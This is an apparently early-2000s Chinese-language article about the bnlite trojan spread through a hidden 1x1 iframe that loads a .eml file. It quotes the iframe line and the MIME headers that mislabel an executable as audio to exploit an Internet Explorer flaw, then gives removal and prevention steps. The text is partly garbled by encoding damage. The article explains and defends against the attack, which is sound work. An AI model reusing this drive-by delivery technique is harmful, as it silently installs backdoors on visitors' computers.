恶意代码与网络安全(2)
#1 一、切身体验
?牐犜诮肽韭硗车墓讨校蟊昶婀值乇涑缮陈┬巫矗蠢吹娜肥怯谐绦蛟谠诵小4蚩扑慊娜挝窆芾砥鳎梢钥吹蕉嗔艘桓鰓incfg.exe的进程。进程对应的文件在Win2000下是c:\winnt\wincfg.exe,在Win98下是c:\windows\wincfg.exe。
?牐犜诵凶⒉岜肀嗉鱮egedit,在“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVerion\Run”下发现wincfg.exe,原来它将自己登记在注册表开机启动项中,这样每次开机都会自动运行wincfg.exe。(如图)(^30040801a^)
?牐犠ⅲ焊阆绿椎娜丝梢宰约荷瓒ㄕ飧瞿韭淼钠舳妥⒉嵛募⒉嵛募簿褪窃诵惺苯汤锏拿疲虼舜蠹铱吹降慕峁赡懿幌嗤?
?牐犜诵薪鹕蕉景裕ǜ娣⑾帧癰ackdoor bnlite”,哦,原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大(仅有6.5K),但它的功能可不少:具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、上传下载……如果你中了该木马,那么木马控制端完全可以通过这个木马在你的电脑上建立一个隐藏的FTP服务器,别人就有最大权限进入你的电脑了!这样控制你的电脑将非常容易!
?牐犇韭硎侨绾蜗略氐戒懒烁弥饕车募扑慊小⒉⒃诵衅鹄吹哪兀吭贗E中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”,将ActiveX相关选项全部都禁用,再浏览该网页,wincfg.exe还是下载并运行了!看来这和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止,再浏览该网页,这回wincfg.exe不再下载了。
#1 二、问题揭示
?牐犖颐抢纯纯磜incfg.exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的语句:
?牐?<iframe src=wincfg.eml width=1 height=1>
?牐犠⒁獾狡渲械摹皐incfg.eml”了吗?大家都知道eml为邮件格式,网页中要eml文件干什么呢?非常可疑!在IE浏览器中输入:http://shirf.51.net/wincfg.eml,再看看任务管理器,wincfg.exe进程又回来了,原来问题就在这个文件上!既然问题在这文件上,当然得想办法得到这个文件看看了。用蚂蚁把文件下载下来,鼠标刚点上去,wincfg.exe又被执行了,真是阴魂不散啊!
?牐牬蚩獁incfg.eml,发现其关键内容如下:
?牐燙ontent-Type: audio/x-wav; name=“wincfg.exe” ★这一句定义了文件名称,在此为wincfg.exe
?牐燙ontent-Transfer-Encoding: base64 ★定义了代码格式为base64
?牐燙ontent-ID: <THE-CID> ★从这里开始才是代码的起步
?牐燭VqQAAMAAAAEAAAA//8AAL……?熞韵律镜粢淮蠼冢? ★这些是wincfg.exe经过base64编码的内容
?牐犐厦婕恿恕啊铩钡牟糠治⑹湍谌荨U飧鲆詁ase64方式编码的文件,会在你浏览网页时编译成wincfg.exe文件并运行,这就是浏览该网页会中木马的原因!至此我就明白了,其实,所谓的浏览网页会中木马,只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已,说白了就是利用了错误的MIME(Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议)头进行攻击。
#1 三、真相大白
?牐犗衷冢倩毓防纯纯次宜械哪韭硎窃趺椿厥隆F涫担瑆incfg.exe这个文件在这里相当于邮件的附件,从我们所列的代码中可以看到,攻击者把wincfg.exe的类型定义为audio/x-wav,由于邮件的类型为audio/x-wav时,IE存在的这个错误的MIME头漏洞会将附件认为是音频文件,并自动尝试打开,结果导致邮件文件wincfg.eml中的附件wincfg.exe(木马)被执行。在Win2000下,即使是用鼠标点击下载下来的wincfg.eml,或是拷贝粘贴该文件,都会导致wincfg.eml中的附件被运行,微软的这个漏洞可真是害人不浅啊。现在看来,原先那些攻击者想方设法欺骗被攻击目标执行修改过的木马等后门程序,是多么落后的手段啊!如今,利用微软“创造”的这个大漏洞来进行攻击,是多么简单、多么容易啊!唯一的条件就是被攻击目标使用IE5.0及以上版本中的一种,使用IE浏览器的用户到底有多少呢?看看你身边的朋友就知道答案了!
#1 四、解决办法
?牐牐?1)点击“开始”→“运行”,在弹出的对话框中输入“regedit”,回车。然后展开注册表到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下删除wincfg.exe;
?牐牐?2)到你的计算机的系统目录下,删除其中的wincfg.exe文件;
?牐牐?3)重新启动机器,就一切OK了!
#1 五、预防方法
?牐?1.IE和Outlook的用户。
?牐牐?1)在IE的“工具→Internet选项→安全→Internet区域的安全级别”,把安全极别由“中”改为“高”。
?牐牐?2)点击“自定义级别”按钮,在弹出的窗口中,禁用“对标记为可安全执行脚本的ActiveX控件执行脚本”、“活动脚本”和“文件下载”功能。
?牐牐?3)禁用所有的ActiveX控制和插件。
?牐牐?4)将资源管理器设置成“始终显示扩展名”。
?牐牐?5)禁止以WEB方式使用资源管理器。
?牐牐?6)取消“下载后确认打开”这种扩展名属性设置。
?牐?2.不要受陌生人的诱惑打开别人给你的URL,如果确实想看,可以通过一些下载工具把页面下载下来,然后用记事本等一些文本编辑工具打开查看代码。
?牐?3.微软公司为该漏洞提供了一个补丁,赶快到下面所列出的URL去看看吧:
?牐爃ttp://www.microsoft.com/windows/IE/download/critical/Q290108/default.asp